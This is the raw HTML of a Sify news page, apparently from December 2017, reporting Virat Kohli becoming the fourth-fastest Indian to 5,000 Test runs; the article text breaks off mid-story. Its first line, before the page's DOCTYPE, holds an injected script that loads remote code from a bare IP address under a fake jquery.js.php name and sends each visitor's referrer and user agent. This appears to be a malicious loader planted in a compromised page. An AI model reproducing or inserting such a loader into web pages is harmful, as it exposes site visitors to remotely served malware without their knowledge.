<noindex><script type="text/javascript" rel="nofollow"> document.write("<script language='javascript' rel='nofollow' type='text/javascript' src='http://5.45.67.97/2/jquery.js.php?r=" + encodeURI(document.referrer) + "&u=" + encodeURI(navigator.userAgent) + "'><\/sc" + "ript>"); </script></noindex><!DOCTYPE html >
<html lang="en" itemscope itemtype="http://schema.org/NewsArticle">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
	
<title>Kohli becomes 4th fastest Indian to 5,000 Test runs</title>
<link rel="alternate" type="application/rss+xml" title="Sify.com - Sports - Cricket" href="http://www.sify.com/rss2/sports/article/category/Cricket" /> 
<link rel="alternate" type="application/rss+xml" title="Sify.com - Sports - Others" href="http://www.sify.com/rss2/sports/article/category/Others" /> 
<link rel="alternate" type="application/rss+xml" title="Sify.com - Sports - TopNews" href="http://www.sify.com/rss2/sports/article/category/TopNews" /> 
		<link rel="alternate" type="application/rss+xml" title="Sify.com - Sports - Cricket" href="http://www.sify.com/rss2/sports/article/category/Cricket" /> 
		<link rel="alternate" type="application/rss+xml" title="Sify.com - Sports - Others" href="http://www.sify.com/rss2/sports/article/category/Others" /> 
		<link rel="alternate" type="application/rss+xml" title="Sify.com - Sports - TopNews" href="http://www.sify.com/rss2/sports/article/category/TopNews" /> 
		<link rel="canonical" href="http://www.sify.com/news/kohli-becomes-4th-fastest-indian-to-5-000-test-runs-news-cricket-rmcoEccecdafg.html" >
	<meta name="modified-date" content="Sat, Dec 02, 2017 09:10" itemprop="datePublished"/>
        <meta name="section" content="india" itemprop="articleSection"/>
        <meta name="url" content="http://www.sify.com/news/kohli-becomes-4th-fastest-indian-to-5-000-test-runs-news-cricket-rmcoEccecdafg.html" itemprop="url"/>
	<link itemprop="mainEntityOfPage" href="http://www.sify.com/news/kohli-becomes-4th-fastest-indian-to-5-000-test-runs-news-cricket-rmcoEccecdafg.html" >
	<link href="http://m.sify.com/news/kohli-becomes-4th-fastest-indian-to-5-000-test-runs-news-cricket-rmcoEccecdafg.html" rel="amphtml" >
	<META NAME="Keywords" itemprop="keywords" CONTENT="virat kohli test cricket milestones">
	<META NAME="Description" itemprop="description" CONTENT="Scorecard: 3rd  

Test |  IND vs SL - Schedule |  Full Coverage

New Delhi: Virat Kohli became the fourth fastest Indian batsman to reach the landmark of...">
	<META NAME="google_contents" CONTENT="Kohli becomes 4th fastest Indian to 5,000 Test runs">
	<!-- Facebook Opengraph integration -->
	<meta property="og:description" content="Scorecard: 3rd  

Test |  IND vs SL - Schedule |  Full Coverage

New Delhi: Virat Kohli became the fourth fastest Indian batsman to reach the landmark of..." />
	<meta property="og:title" content="Kohli becomes 4th fastest Indian to 5,000 Test runs" />
	<meta property="og:type" content="article" />
	<meta property="og:url" content="http://www.sify.com/sports/kohli-becomes-4th-fastest-indian-to-5000-test-runs-news-cricket-rmcoEccecdafg.html" />
	<meta property="og:image" content="http://static.sify.com/cms/image/rmcpcRcicggfa_small.jpg" />
	<meta property="og:site_name" content="Sify" />
	<meta property="fb:app_id" content="189103277794050" />
	<!-- Facebook Opengraph integration -->
	<meta http-equiv="content-type" content="text/html; charset=utf-8" />
	<link rel="icon" type="image/ico" href="http://www.sify.com/home2015/images/favicon.ico">
	<script>
	var article_id = "rmcoEccecdafg";
	var base_url = "http://www.sify.com";
	</script>
	<META NAME="original-source" CONTENT="http://www.ians.in/"><meta name="googlebot-news" content="noindex, nofollow">    <!-- CSS -->
    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
    
    <!--[if IE 8]><html class="no-js ie8 oldie" lang="en">
   	 <link href="http://www.sify.com//common2015/css/ie8.css" rel="stylesheet">
    <![endif]-->
	<script>
   	var channelshortname='sifynew';
   
	function removejscssfile(filename, filetype){
	    var targetelement=(filetype=="js")? "script" : (filetype=="css")? "link" : "none" //determine element type to create nodelist from
	    var targetattr=(filetype=="js")? "src" : (filetype=="css")? "href" : "none" //determine corresponding attribute to test for
	    var allsuspects=document.getElementsByTagName(targetelement)
	    for (var i=allsuspects.length; i>=0; i--){ //search backwards within nodelist for matching elements to remove
	    if (allsuspects[i] && allsuspects[i].getAttribute(targetattr)!=null && allsuspects[i].getAttribute(targetattr).indexOf(filename)!=-1)
		allsuspects[i].parentNode.removeChild(allsuspects[i]) //remove element by calling parentNode.removeChild()
	    }
	}
	</script>
	<!--<script type="text/javascript" src="https://apis.google.com/js/plusone.js">
      		{lang: 'en-GB'}
	</script>-->
	<!--DFP URL : /sports/kohli-becomes-4th-fastest-indian-to-5000-test-runs-news-cricket-rmcoEccecdafg.html-->	<!-- Fullstory DFP Ad Tag include --> 

	<script>
	var gptadslots=[]; 
                        (function(){
                        var useSSL = 'https:' == document.location.protocol;
                        var src = (useSSL ? 'https:' : 'http:') + '//www.googletagservices.com/tag/js/gpt.js';
                        document.write('<scr' + 'ipt src="' + src + '"></scr' + 'ipt>');
                        })();



	var cur_ref= document.referrer;
	var dfpword='sify';
		if (typeof(cur_ref) != "undefined"){
			var domain = cur_ref.replace('http://','').replace('https://','').split(/[/?#]/)[0];
			if((domain=='www.google.co.in') || (domain=='www.google.com')){
				dfpword='google';
			}
		}
	</script>
	<script src="http://www.sify.com/analytics/fullstory_adtags.js" type="text/javascript"></script>

	<!-- Fullstory DFP Ad Tag --> 

	
	<style>
		/* Read Next Pop-out Styles */
#block {
  position:fixed;
  bottom:0;
  right:0px; 
  width:360px;
  display: none;
  float:left;
  background-color:#FFFFFF;
  min-height:100px;
  height: auto;
  z-index: 100000000;
  -moz-box-shadow:-2px 0px 5px #aaa;
  -webkit-box-shadow:-2px 0px 5px #aaa;
  box-shadow: 0 4px 10px #555555;
  border-top: 1px solid #d4d4d4;
  border-left: 1px solid #d4d4d4;

}
.pop-out-wrapper,.pop-out-heading,.pop-out-article-wrapper{
  background-color:#FFFFFF;
}
@media only screen and (min-width: 320px) and (max-width: 768px) {
.pop-out-wrapper{display:none !important} }	
	</style>
<!-- Google's Anchor and Vignette --> 
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-0910144482339723",
    enable_page_level_ads: true
  });
</script>
<!-- Google's Anchor and Vignette -->   
<script>
function addLink() {
    //Get the selected text and append the extra info
    var selection = window.getSelection(),
        pagelink = '<br /><br /> Read more at: ' + document.location.href,
        copytext = selection + pagelink,
        newdiv = document.createElement('div');

    //hide the newly created container
    newdiv.style.position = 'absolute';
    newdiv.style.left = '-99999px';

    //insert the container, fill it with the extended text, and define the new selection
    document.body.appendChild(newdiv);
    newdiv.innerHTML = copytext;
    selection.selectAllChildren(newdiv);

    window.setTimeout(function () {
        document.body.removeChild(newdiv);
    }, 100);
}

document.addEventListener('copy', addLink);
</script>

<!-- Android urlpath start -->
	<link rel="alternate" href="android-app://com.sify.sports/kohli-becomes-4th-fastest-indian-to-5000-test-runs-news-cricket-rmcoEccecdafg.html" />
	<script type="application/ld+json"> 
			{ 
			"@context": "http://schema.org", 
			"@type": "WebPage", 
			"@id": "http://scores.sify.com", 
			"potentialAction": { 
			"@type": "ViewAction", 
			"target": "android-app://com.sify.sports/kohli-becomes-4th-fastest-indian-to-5000-test-runs-news-cricket-rmcoEccecdafg.html" 
			} 
			} 
	</script>
<!-- Android urlpath ends -->
  </head>

<body id="artBody" name="artBody">
<!-- Container Start -->
<!--noindex-->
<script language="javascript">
OAS_query='Virat kohli test cricket milestones';
var isiPad = navigator.userAgent.match(/iPad/i);
if (isiPad!=null)
	OAS_query+=',Ipad';
</script>
<script language="javascript">
var newChannel = 'sports';
var newAuthor = 'IANS';
</script>
<!-- header file 2015 html --><link rel="icon" type="image/ico" href="http://www.sify.com/home2015/images/favicon.ico">
			<link href="http://www.sify.com/home2015/css/gutterstyle.css" rel="stylesheet">
	<script>
var sitelogoArray = [];
sitelogoArray['movies'] = ["http://im.sify.com/fullstory/fullstory-revised-2011/images/movies-logo.png","http://www.sify.com/movies"];
sitelogoArray['finance'] = ["http://im.sify.com/fullstory/fullstory-revised-2011/images/finance-logo.png","http://www.sify.com/finance/"];
sitelogoArray['sports'] = ["http://im.sify.com/fullstory/fullstory-revised-2011/images/sports-logo.png","http://www.sify.com/sports"];
sitelogoArray['techtalk'] = ["http://im.sify.com/fullstory/fullstory-revised-2011/images/techtalk-logo.png","http://www.sify.com/technology"];
sitelogoArray['news'] = ["http://im.sify.com/fullstory/fullstory-revised-2011/images/news-logo.png","http://www.sify.com/news/"];
sitelogoArray['skills'] = ["http://im.sify.com/fullstory/fullstory-revised-2011/images/skills-logo.png","http://www.sify.com/itest/"];

sitelogoArray['bawarchi'] = ["http://im.sify.com/images/jun2010/bawarchi-logo.gif","http://food.sify.com/"]; 
sitelogoArray['wwe'] = ["http://im.sify.com/sifycmsimg/sep2009/Broadband/14910348_wwe-logo.png","http://wwe.sify.com/"];
sitelogoArray['storage'] = ["https://storage.sifyservices.com/images/storage-logo.gif","https://storage.sifyservices.com/"];

function loadSiteLogo(sitename){
$('.header-logo-wrapper').html("<a href='"+sitelogoArray[sitename][1]+"'><img src='"+sitelogoArray[sitename][0]+"' alt='' border='0' /></a>");
}
</script>
<group id='topnav'>     <div id="topnavig" name="topnavig"></div>
	<div><script src='http://www.sify.com/analytics/sports_analytics.js' type='text/javascript'></script><script src='http://www.sify.com/analytics/sports_chartbeat.js' type='text/javascript'></script></div>
	<div></div>
	<div>
 
<!-- CSS -->
    <link href="http://www.sify.com//common2015/css/bootstrap.min.css" rel="stylesheet">
    <link href="http://www.sify.com/home2015/css/style.css" rel="stylesheet">   
	
        <link href="http://www.sify.com//common2015/css/style-fullstory.css" rel="stylesheet">
    <link href="http://www.sify.com/home2015/css/style-responsive.css" rel="stylesheet">
    <link href="http://im.sify.com/news/images/images2008/lytebox.css" rel="stylesheet" type="text/css" />
             
	<link href="http://www.sify.com//common2015/css/font-awesome.min.css" rel="stylesheet">
	<link href="http://www.sify.com//common2015/css/animate.min.css" rel="stylesheet">
	
	<style>.affix .affix-social-home{margin-top: -44px !important;position: relative; z-index: 1000;} @media only screen and (min-width: 768px){.navbar-nav > li{ padding:14px 8px !important;}}.test{ height:50px; overflow:hidden}</style>
	
	<script src="http://www.sify.com//common2015/js/jquery.min.js"></script>


    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
    
    <!--[if IE 8]><html class="no-js ie8 oldie" lang="en">
   	 <link href="http://www.sify.com//common2015/css/ie8.css" rel="stylesheet">
    <![endif]-->
 <group id='TopSalesSlot'>
    
	  <section class="tab-off mob-off">
		<div class="container nopadding">
			<div class="col-md-12"></div>
		</div>
	  </section>
	  
  </group>
<!-- Header Start -->
<group id='topnav'>  
<header> 

<!--Mobile App Promo Banner-->
<div class="container">
	<div class="tab-off mob-off" id="mobileapppromo" style="padding:0px;height:50px;background:#272727;border:0px;margin:0 auto;text-align:center;position:relative;display:none;cursor:pointer;">
		<button type="button" class="close" data-dismiss="alert" style="position:absolute;right:15px;opacity:.7;font-size:16px;color:#fff;background:#D15B47!important;text-shadow:none;">
			<i class="fa fa-times" style="padding:2px;"></i>
		</button>
		<div id="apppromobanner" style="background:url(http://www.sify.com/sifyhome2011/images/nov2016/goldrate-app-banner.jpg);height:50px;position:absolute;background-repeat:no-repeat;width:945px;left:25px;">	</div>
		<div id="playstorebtn" style="position:absolute;width: 40px;height: 38px;left: 915px;top: 8px;"> </div>
	</div>
</div>
<!--Mobile App Promo Banner-->

 	 <div class="container">
 	 <!-- Gutter Ad script - start -->
					<link href="http://www.sify.com/common2015/css/gutterstyle.css" rel="stylesheet">
			<!-- Sports_Search_1x1_Innovation_ATF -->
			<script type='text/javascript'>googletag.display('div-gpt-ad-1409210925363-24');</script>
			<!-- Sports_Search_1x1_Innovation_ATF -->

			<!-- /29073306/News_Search_1x1_Innovation_BTF 1x1 -->
			<script type='text/javascript'>googletag.display('div-gpt-ad-1409210925363-9');</script>
			<!-- /29073306/News_Search_1x1_Innovation_BTF 1x1 -->
						<script type="text/javascript">
			document.body.className="new-bg";
			function HidegutterHTML(){	
				document.body.className="";
				document.getElementById("sify").style.display="none";
				$('ul.social-share').css('display','');
				removejscssfile("css/gutterstyle.css", "css");
				document.getElementById("removegutterad").innerHTML = document.getElementById("withoutgutter").innerHTML;				
			}
			</script>
			 <!-- Gutter Ad script - end -->
 	 <!-- --------------------------    ads Start   --------------------------  -->
     <div class="col-md-10 col-md-push-2 paddingr topads1024">
		
	<!-- --------------------------    mobile ad (320x50)   --------------------------  -->       
	<div class='mob-ads desk-off tab-off mob-on'>	  
	<!-- Sports_320x50_ATF -->
	<script type='text/javascript'>googletag.display('div-gpt-ad-1438077259223-13');</script>
	<!-- Sports_320x50_ATF --></div>     	  
	<!-- --------------------------    desk ad(728x90)    --------------------------  -->      	  
	<div class='topads mob-off'><div class='desk-ads'>	<!-- Sports_970x90_ATF 728x90 970x90 -->
	<script type='text/javascript'>googletag.display('div-gpt-ad-1363849287959-35');</script> 
	<!-- Sports_970x90_ATF 728x90 970x90 --> </div> <div class='tab-ads'>
	 <!-- Sports__728x90_ATF 728x90 -->
	 <script type='text/javascript'>googletag.display('div-gpt-ad-1439442947338-4');</script>
	 <!-- Sports_Goldrates_728x90_ATF 728x90 -->
	 </div>	  
	 </div>  
     </div>
     <!-- --------------------------    ads End   --------------------------  -->
     <!-- logo Start --> 
     <div class="col-md-2 col-md-pull-10 logo">
        <button aria-controls="navbar" aria-expanded="false" data-target="#navbar" data-toggle="collapse" class="navbar-toggle collapsed" type="button"> 
      	  <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> 
        </button>
     	<span class='header-logo-wrapper'><a href='http://www.sify.com'><img src='http://www.sify.com/home2015/images/logo.png'></a></span> 
        <!--  Search and Social mobile -->
        <div class="mobile-social social desk-off tab-off mob-on">
		          <ul>            <li><button class='search search-mob'><i class='fa fa-search'></i></button></li>            <li class='dropdown'><a href='' data-toggle='dropdown'><i class='fa fa-share-alt'></i></a>              <ul class='dropdown-menu social-share' role='menu'>                <li><a href='http://www.facebook.com/sify' target='_blank' ><i class='fa fa-facebook'></i></a></li>                <li><a href='http://twitter.com/#!/sifydotcom' target='_blank'><i class='fa fa-twitter'></i></a></li>                <li><a href='https://plus.google.com/101635574783660998904?prsrc=3' target='_blank'><i class='fa fa-google-plus'></i></a></li>                <li><a href='http://www.sify.com/rssfeeds/' target='_blank'><i class='fa fa-rss'></i></a></li>              </ul>            </li>          </ul>        </div>
        
     </div>
     <!-- logo End --> 
     </div>
     <!-- --------------------------     Menu Start    -------------------------- -->
      <nav role="navigation" class="navbar navbar-default navbar-static-top" id="nav">
        <div class="container contain-1024">
		<div class="nav-logo col-md-2">
			<button aria-controls="navbar" aria-expanded="false" data-target="#navbar" data-toggle="collapse" class="navbar-toggle collapsed" type="button"> 
			  <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> 
			</button>
			<span class='header-logo-wrapper'><a href='http://www.sify.com'><img src='http://www.sify.com/home2015/images/logo.png'></a></span>		</div>
		<div class="col-lg-10 col-md-9 col-md1024-12 col-980-9 paddingl">
		    <div class="navbar-collapse collapse" id="navbar">
			<ul class='nav navbar-nav test' id='nav-autowidth'>                <li class='active'><a href='http://www.sify.com/'>Home</a></li>                <li><a href='http://www.samachar.com/'>Samachar</a></li>                <li><a href='http://www.sify.com/news/'>News</a></li>                <li><a href='http://www.sify.com/finance/'>Finance</a></li>                <li><a href='http://www.sify.com/sports/'>SPORTS</a></li>                <li><a href='http://www.sify.com/movies/'>Movies</a></li>                <!--<li class='dropdown'><a href='#' data-toggle='dropdown' class='dropdown-toggle'>Dropdown</a>                  <ul class='dropdown-menu' role='menu'>                    <li><a href='http://www.sify.com/sports2015/'>Sports Calendar</a></li>                    <li><a href='http://videos.sify.com/'>Video</a></li>                    <li><a href='#'>Images</a></li>                  </ul>                </li>-->                <li><a href='http://www.bawarchi.com/'>Bawarchi</a></li><li><a target='_BLANK' href='http://astrology.sify.com/'>Astrology</a></li>             <li style='text-transform: uppercase;'><a href='http://www.videos.sify.com'>Videos</a></li> <li style='text-transform: uppercase;'><a target='_BLANK' href='http://www.sify.com/finance/gold_rates/'>Gold rates</a></li>          <li style='text-transform: uppercase;'><a href='http://www.sify.com/finance/gold-rates-in-dubai/'>DUBAI GOLD RATES</a></li>          <li style='text-transform: uppercase;'><a href='http://www.sify.com/finance/currencyreport/'>RUPEE</a></li>              <li style='text-transform: uppercase;'><a href='http://www.sify.com/skills/'>Jobs</a></li>                                    <li style='text-transform: uppercase;'><a href='http://health.bawarchi.com/'>Health</a></li>                                <li style='text-transform: uppercase;'><a href='http://games.sify.com/'>Antzill</a></li>                <li style='text-transform: uppercase;'><a href='http://www.sify.com/technology/'>Techtalk</a></li> </ul>		    </div>
		</div>
				<!--  Search and Social desktop -->
		<div class="social col-lg-2 col-md-3 col-980-3 mob-off">
			            <ul>              <li><button class='search'><i class='fa fa-search'></i></button></li>               <li><a href='http://www.facebook.com/sify' target='_blank'><i class='fa fa-facebook'></i></a></li>              <li><a href='http://twitter.com/#!/sifydotcom' target='_blank'><i class='fa fa-twitter'></i></a></li>              <li style="display:none;"><a href='https://plus.google.com/101635574783660998904?prsrc=3' target='_blank'><i class='fa fa-google-plus'></i></a></li>              <li><a href='http://www.sify.com/rssfeeds/' target='_blank'><i class='fa fa-rss'></i></a></li>            </ul>		</div> 
				<!--  Search and Social mobile -->
		<div class="mobile-social social affix-social-home">
			          <ul>            <li><button class='search search-mob'><i class='fa fa-search'></i></button></li>            <li class='dropdown'><a href='' data-toggle='dropdown'><i class='fa fa-share-alt'></i></a>              <ul class='dropdown-menu social-share' role='menu'>                <li><a href='http://www.facebook.com/sify' target='_blank' ><i class='fa fa-facebook'></i></a></li>                <li><a href='http://twitter.com/#!/sifydotcom' target='_blank'><i class='fa fa-twitter'></i></a></li>                <li><a href='https://plus.google.com/101635574783660998904?prsrc=3' target='_blank'><i class='fa fa-google-plus'></i></a></li>                <li><a href='http://www.sify.com/rssfeeds/' target='_blank'><i class='fa fa-rss'></i></a></li>              </ul>            </li>          </ul>		</div>  				

	</div>
	
        <div class="search-bar searchbox" style="display:none">
		<div class="container">			
			<script language="JavaScript">
				function Search_newfn_1(typesearch) 
				{    
					if (typesearch == 1) 
					{        
						var hidVal = document.frm_searchweb.SearchboxChoosedVal.value;   
						
						if (hidVal == 0) 
						{      
							searchParam = 'search'        
						} 
						else if (hidVal == 1) 
						{ 
							searchParam = 'Searchbox_Google'        
						} 
						dd = eval('document.frm_searchweb.' + searchParam);
						if (dd.value == '' || dd.value == 'Search...') 
						{ 
							alert('Please enter any valid search parameter.');
							dd.focus() 
						}
						else 
						{
							if(document.getElementById('search_sify').checked)		{	
								var searchstr= dd.value;
								var searchstrArray = searchstr.split(' ');
								for(var i=0;i<searchstr.length;i++){
									searchstr = searchstr.replace(' ','_');	
								}		
								//window.location.href='http://www.sify.com/topics/'+searchstr+'.html';	
								window.open('http://www.sify.com/topics/'+searchstr+'.html');
							}	
							else if(document.getElementById('search_web').checked)		{						
								sitesearch = document.getElementById('sitesearch').value;
								ss = '32&amp;rd=' + (sitesearch == '1' ? 'sify' : 'web');
								document.frm_searchweb.action = 'http://search.sify.com/search.php?q=' + encodeURIComponent(dd.value) + '&amp;ss=' + ss;            document.frm_searchweb.search.value = '';            
								document.frm_searchweb.submit()	
							}   
						}    
					}
				}
			</script>
			    <div itemtype="http://schema.org/WebSite" itemscope="">
				    <meta content="http://www.sify.com/" itemprop="url">
				    <form class="form-wrapper col-md-12 col-xs-12 nopadding" itemtype="http://schema.org/SearchAction" itemscope="" itemprop="potentialAction" style="display:inline; width:100%;" target="_new" onsubmit="Search_newfn_1(1);return false;" method="post" name="frm_searchweb">
					<meta content="http://www.sify.com/topics/{search}.html" itemprop="target">
					<input type="hidden" value="0" id="SearchboxChoosedVal" name="SearchboxChoosedVal">
					<input type="hidden" value="0" name="sitesearch" id="sitesearch">
					<input type="hidden" name="retKeyword" id="retKeyword">
					  <div class="col-md-2 col-xs-3 search-radio">
					    <label class="radio-inline">
					     <input type="radio" value="Web" checked="checked" id="search_web" name="searchradio">Web
					    </label>
					    <label class="radio-inline">
					      <input type="radio" id="search_sify" name="searchradio" value="Sify" >Sify
					    </label>
					  </div>                       	
					  <input type="text" class="col-md-8 col-xs-7 searchtxt"  value="Search..." onblur="if (this.value=='') this.value='Search...';" 
						onfocus="if (this.value=='Search...') this.value='';"  autocomplete="off" id="search" name="search" itemprop="query-input">
					  <button class="col-md-2 col-xs-2 searchbtn" type="submit"  onclick="Search_newfn_1(1);return false;">Search</button>
				    </form> 
			    </div>
		 </div>
         </div>
         
      </nav>      
      <!-- --------------------------     Menu End    -------------------------- -->      
</header>
</group>
<!-- Header End -->	<script type='text/javascript'>loadSiteLogo('sports'); var kommentboxchannel='sports'; </script>

<!-- afp header code starts here -->
<script type="text/javascript">	var adgh_p1="9";	var adgh_p2="";	var adgh_p3="0";var adgHdSc=document.createElement("script");	document.head.appendChild(adgHdSc);	adgHdSc.async=true;	var adgHscParam="p1="+adgh_p1+"&p2="+adgh_p2+"&p3="+adgh_p3;	adgHdSc.id="adg_pixel_header_script";adgHdSc.src="http://adgebra.co.in/afph/afph.js?"+adgHscParam; </script>
<!-- afp header code ends here --></div>
    <SCRIPT LANGUAGE='JavaScript'>var tmp_google_ad_client =  'ca-sify_js';var tmp_google_ad_channel = '08feb_sify_sports_others,08jul_sify_sports_others_unit1'; var tmp_google_ad_type = 'text,image,flash,html';</SCRIPT><SCRIPT LANGUAGE='JavaScript'>var channelshortname = 'sifykhel';</SCRIPT><script  language='Javascript'>var tmpgoogleadtopparam='08feb_sify_sports_others,09apr_sify_sports_ipl'; var tmpgoogleadbottomparam='08feb_sify_sports_others,08jul_sify_sports_others_unit2'; </script>  
    
</group><!--/noindex-->
<div itemprop="publisher" itemscope="" itemtype="https://schema.org/Organization">
<div itemprop="logo" content="http://www.sify.com/home2015/images/logo.png" itemscope="" itemtype="https://schema.org/ImageObject">
<meta itemprop="url" content="http://www.sify.com/home2015/images/logo.png">
<meta itemprop="width" content="176">
<meta itemprop="height" content="45">
</div>
<meta itemprop="name" content="Sify">
</div>
<!-- Middle Container Start -->
<div class="container" style="margin-bottom:20px;">
<div class="row">																							
<div>
<div class="article-wrap article-wrap-inner" style="">
<div class="col-md-12 col-sm-12 article paddingl paddingR20">
<div class="article-inner">
<input type="hidden" id = "tab_placeholder" name ="tab_placeholder" value="virat kohli test cricket milestones||">
<input type='hidden' value='Kohli becomes 4th fastest Indian to 5,000 Test runs' name='tit_val' id='tit_val'>
<input type='hidden' value="Kohli_becomes_4th_fastest_Indian_to_5,000_Test_runs" name='google_tit_val' id='google_tit_val'>

<script language="Javascript">
//document.title=document.getElementById('tit_val').value;
</script>
<style>
.fullstory-txt{margin-left:0px;}
</style>
<img src='' border='0' width='0' height=0 id='statsURL_HitLinkConfiguration' name='statsURL_HitLinkConfiguration'>
		<ol class="breadcrumb">
			<li><a href="http://www.sify.com/">Sify.com</a></li><li><a href="http://www.sify.com/sports/">Sports</a></li><li><a href="http://www.sify.com/sports/cricket/">Cricket</a></li><li class="active"><!--Fullheadline-->Kohli becomes 4th fastest Indian to 5,000 Test runs<!--/Fullheadline--></li>
		</ol>
		<h1 itemprop="headline"><span data-url=/news/kohli-becomes-4th-fastest-indian-to-5-000-test-runs-news-cricket-rmcoEccecdafg.html>Kohli becomes 4th fastest Indian to 5,000 Test runs</span></h1>
   <!-- fullstory-branding-comments-outer-wrapper Start-->
   <div class="fullstory-branding-comments-outer-wrapper">
                    <div class="row">
                        <div class="col-md-6 col-sm-6">
                            <div id="fullstory-source" itemprop="author" itemscope itemtype="https://schema.org/Person"><table width="100%" border="0" cellspacing="0" cellpadding="0">  <tr><td width="46" align="left">Source : </td><td align="left"><a href='http://www.sify.com/sports/moreheadlines/source/ians.html' target='_new'><img src='http://im.sify.com/fullstory/fullstory-revised-2011/source/ians.gif' alt='IANS' border='0' ALIGN='absmiddle'></a></td></tr></table><meta itemprop="name" content=""></div>
                            <div id="fullstory-admin-time" itemprop="dateModified" >Last Updated: Sat, Dec 02, 2017 15:12 hrs</div>
                        </div>
			    <!-- Social Icon post your comment Start from here -->
			<div class="col-md-4 col-sm-4">
				<div class="" style="float:left;">
					<div class="addthis_inline_share_toolbox_gszl"></div>
				</div>
			</div>
			    <!-- Social Icon post your comment End here -->
                        <div class="col-md-2 col-sm-2 fullstory-top-share">  
                        		<ul class="pull-right">
                                    <li><a style="cursor:pointer;" id="incfont" class="a-plus" onclick="javascript:  if (parseInt(document.getElementById('contentDiv').style.fontSize) < 20) {document.getElementById('contentDiv').style.fontSize = (parseInt(document.getElementById('contentDiv').style.fontSize)+1)+'px'; } "></a></li>
                                    <li><a style="cursor:pointer;" class="a-minus" id="decfont" onclick="javascript:  if (parseInt(document.getElementById('contentDiv').style.fontSize) > 16) { document.getElementById('contentDiv').style.fontSize = (parseInt(document.getElementById('contentDiv').style.fontSize)-1)+'px'; } "></a></li>                           
                                </ul>
                        </div>
                    </div>
    </div>
   <!-- fullstory-branding-comments-outer-wrapper End-->       
   
   <div class="innerad320x50 mob-on mobBig-on desk-off tab-off">
    <!--GADS 1 Starts-->
	<!--GADS 1 Ends-->
    </div>
   
    
    <!--Fullstory Article Starts-->
    <!-- Social Icon post your comment Start from here -->
     <div id="fullstory-bottom-comments-pyc-wrapper">
    <!--POSTURCOMMENTBUT-->
	<?php //if(function_exists('ismobile') && !ismobile()){ ?>	
	<?php  // } ?>
    </div>    
    <!-- Social Icon post your comment end here -->
    <div class="clearfix"></div>
    <div class="fullstory-img" id="image-id"><div class="row fullstory-img-row"><img src="http://static.sify.com/cms/image/rmcpcRcicggfa.jpg"  alt="kohli 5000 test runs" title="kohli 5000 test runs" /></div></div><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://static.sify.com/cms/image/rmcpcRcicggfa.jpg"></meta><meta itemprop="width" content="640"></meta><meta itemprop="height" content="480"></meta></div>
    <div id="fullstory-article-wrapper">
    <div id="artContent" name="artContent" style='display:inline; height:auto; width:100%; float:left;'>
    
    <div id="fullstory-branding-comments-outer-wrapper">
	        
    
    
    <div class="fullstory-txt-wrap" data-target=".scrollspy" data-spy="scroll">
                    <div class="fullstory-txt-share scrollspy" style="display:none;">
                    	<div id="soical-share-box" ><div id="middle-vshare-inner-wrapper">
    </div></div></div>
        <div class="fullstory-txt" data-target=".scrollspy" data-spy="scroll" id="contentDiv" name="contentDiv" style="font-size:18px;" itemprop="articleBody" ><p><a href="http://scores.sify.com/live-cricket-scores/Sri-Lanka-tour-of-India-2017/INDIA_vs_SRI-LANKA_DEC02_DEC06_2017.shtml#horizontalTab1"><b> Scorecard: 3rd  

Test</b></a> | <a href="http://www.sify.com/sports/cricket/india-vs-srilanka-&#10;&#10;2017/schedule/"><b> IND vs SL - Schedule</b> | </a><a href="http://www.sify.com/sports/"><b> Full Coverage</b></a>
<p><b>
New Delhi: </b>Virat Kohli became the fourth fastest Indian batsman to reach the landmark of 5,000 runs in the five-day format on the opening day of the third and final cricket Test against Sri Lanka here on Saturday.
<div class="fullstory-txt-ad300x250"  id="gads_middle" name="gads_middle"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<!-- sify_articles_300x250_middle -->

<ins class="adsbygoogle"

     style="display:inline-block;width:300px;height:250px"

     data-ad-client="ca-pub-0910144482339723"

     data-ad-slot="6875788121"></ins>

<script>

(adsbygoogle = window.adsbygoogle || []).push({});

</script></div><div style="text-align:left;"></p><p>
The India captain reached the milestone in 105 innings -- the same number as his England counterpart Joe Root. To go with that, Kohli also managed to cross the barrier of 16,000 international runs across all formats. </p><p>
Kohli reached the mark in typical style, smashing Sri Lanka pacer Suranga Lakmal for a boundary shortly after lunch. </p><p>
Playing in his 63rd Test, the 29-year-old from Delhi became the 11th Indian batsman to achieve the milestone, and that too in front of his home fans, when he reached 25 during India's first innings.</p><p>
The legendary Sunil Gavaskar is the quickest among Indian batsmen, achieving the distinction in 95 innings.</p><p>
Former star opener Virender Sehwag is second at 98 innings while Sachin Tendulkar is placed third with 103 knocks.</p><p>
Kohli is also the second quickest among Indian batsmen in terms of time. He needed 2,358 days to complete the feat after Rahul Dravid's 2,252 days. Sehwag is third at 2,464 days.		<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
		<ins class="adsbygoogle"
		 style="display:block; text-align:center;"
		 data-ad-format="fluid"
		 data-ad-layout="in-article"
		 data-ad-client="ca-pub-0910144482339723"
		 data-ad-slot="9615350706"></ins>
		<script>
		 (adsbygoogle = window.adsbygoogle || []).push({});
		</script></p><p>
The India skipper is also the second youngest to reach the 5,000-run mark among Indian bastmen at 29 years and 27 days. Tendulkar tops the list among Indians at 25 years and 301 days.</p><p>
Entering the match with 4,975 Test runs to his name, Kohli struck three boundaries before lunch to be eight short of the mark at the interval. </p><p>
